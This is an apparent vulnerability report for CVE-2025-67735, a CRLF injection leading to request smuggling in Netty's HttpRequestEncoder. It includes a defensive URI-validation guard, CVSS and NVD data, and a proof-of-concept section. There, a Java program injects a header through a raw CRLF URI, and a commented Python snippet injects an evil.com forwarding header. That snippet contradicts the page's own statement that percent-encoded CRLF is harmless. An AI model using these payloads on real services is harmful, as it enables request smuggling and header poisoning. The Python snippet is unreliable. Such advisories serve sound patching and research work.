Security Vulnerability Report
CVE-2025-67735 CVSS 6.5 MEDIUM

Published: 2025-12-16 01:15:52
Last Modified: 2026-01-02 18:50:23

Description

Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.129.Final and 4.2.8.Final, `io.netty.handler.codec.http.HttpRequestEncoder` is subject to CRLF injection through the request URI when constructing a request. This leads to request smuggling when `HttpRequestEncoder` is used without proper sanitization of the URI. Any application or framework using `HttpRequestEncoder` can be abused to perform request smuggling via CRLF injection. Versions 4.1.129.Final and 4.2.8.Final fix the issue.
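
As an added defensive example (not Netty's own code, and not the fix shipped in 4.1.129.Final / 4.2.8.Final): an application-level guard, `SafeRequestFactory` (hypothetical name), that rejects raw CR, LF and other control characters in the request target before a request object is handed to `HttpRequestEncoder`, so an unpatched encoder never receives a URI it would write verbatim.

```java
import io.netty.handler.codec.http.DefaultFullHttpRequest;
import io.netty.handler.codec.http.HttpMethod;
import io.netty.handler.codec.http.HttpRequest;
import io.netty.handler.codec.http.HttpVersion;

/** Hypothetical application-side guard; not part of Netty. */
public final class SafeRequestFactory {

    /**
     * Rejects any URI that could break the request line. The request line is
     * delimited by SP and CRLF, so CR, LF, any other control character, space
     * and non-ASCII bytes must never appear raw in the request target.
     * Percent-encoded forms such as "%0d%0a" are plain ASCII and are allowed;
     * they are written through unchanged and do not split the request line.
     */
    static void requireSafeUri(String uri) {
        if (uri == null || uri.isEmpty()) {
            throw new IllegalArgumentException("empty request URI");
        }
        for (int i = 0; i < uri.length(); i++) {
            char c = uri.charAt(i);
            if (c <= 0x20 || c >= 0x7F) {
                throw new IllegalArgumentException(String.format(
                        "illegal character U+%04X at index %d in request URI", (int) c, i));
            }
        }
    }

    /** Builds an outbound request only after the URI has passed the check. */
    static HttpRequest newGet(String uri) {
        requireSafeUri(uri);
        return new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, uri);
    }

    public static void main(String[] args) {
        newGet("/normal-path?q=1");                    // accepted
        try {
            newGet("/normal-path\r\nX-Injected: 1");  // rejected before encoding
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Upgrading to a fixed Netty release remains the primary remedy; this guard only ensures untrusted input cannot reach the encoder as a raw request target in the meantime.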

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:* - VULNERABLE (Netty 4.1.x < 4.1.129.Final)
cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:* - VULNERABLE (Netty 4.2.x < 4.2.8.Final)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```java
import io.netty.buffer.ByteBuf;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.http.DefaultHttpRequest;
import io.netty.handler.codec.http.HttpMethod;
import io.netty.handler.codec.http.HttpRequestEncoder;
import io.netty.handler.codec.http.HttpVersion;
import io.netty.util.CharsetUtil;

public class CRLFInjectionPOC {
    public static void main(String[] args) {
        // HttpRequestEncoder.encode() is not callable directly (the original
        // encoder.encode(null, request) call does not exist), so the encoder
        // is driven through an EmbeddedChannel instead.
        EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestEncoder());

        // Malicious URI with a raw CRLF. A percent-encoded "%0d%0a" is plain
        // ASCII and is written through unchanged; only raw CR/LF characters in
        // the URI string break the request line.
        String maliciousUri = "/normal-path\r\nX-Injected-Header: malicious-value";

        // Create HTTP request with malicious URI
        DefaultHttpRequest request = new DefaultHttpRequest(
                HttpVersion.HTTP_1_1, HttpMethod.GET, maliciousUri);

        // Encode the request - on vulnerable versions this produces the
        // smuggled header; 4.1.129.Final / 4.2.8.Final do not.
        channel.writeOutbound(request);
        ByteBuf encoded = channel.readOutbound();

        System.out.println("Encoded request (hex):");
        for (int i = 0; i < encoded.readableBytes(); i++) {
            System.out.print(String.format("%02x ", encoded.getByte(i)));
        }
        System.out.println();
        System.out.println(encoded.toString(CharsetUtil.US_ASCII));
        encoded.release();
        channel.finish();

        // The encoded output will contain:
        // GET /normal-path\r\nX-Injected-Header: malicious-value HTTP/1.1\r\n\r\n
        // Legitimate request following will be treated as second request
    }
}

// Python PoC for testing:
// import requests
// target_url = "http://target-server.com"
// malicious_path = "/api/endpoint%0d%0aX-Forwarded-Host: evil.com"
// response = requests.get(target_url + malicious_path)
```

References

https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4 (Vendor Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-67735",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T01:15:52.367",
    "lastModified": "2026-01-02T18:50:23.313",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.129.Final and 4.2.8.Final, the `io.netty.handler.codec.http.HttpRequestEncoder` has a CRLF injection with the request URI when constructing a request. This leads to request smuggling when `HttpRequestEncoder` is used without proper sanitization of the URI. Any application / framework using `HttpRequestEncoder` can be subject to be abused to perform request smuggling using CRLF injection. Versions 4.1.129.Final and 4.2.8.Final fix the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-93"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.1.129",
                "matchCriteriaId": "BF4FCC2E-6E1A-47D1-BF7F-08F39F24BEED"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.2.0",
                "versionEndExcluding": "4.2.8",
                "matchCriteriaId": "C04C7ED6-5377-4176-81F4-739B74AD632C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```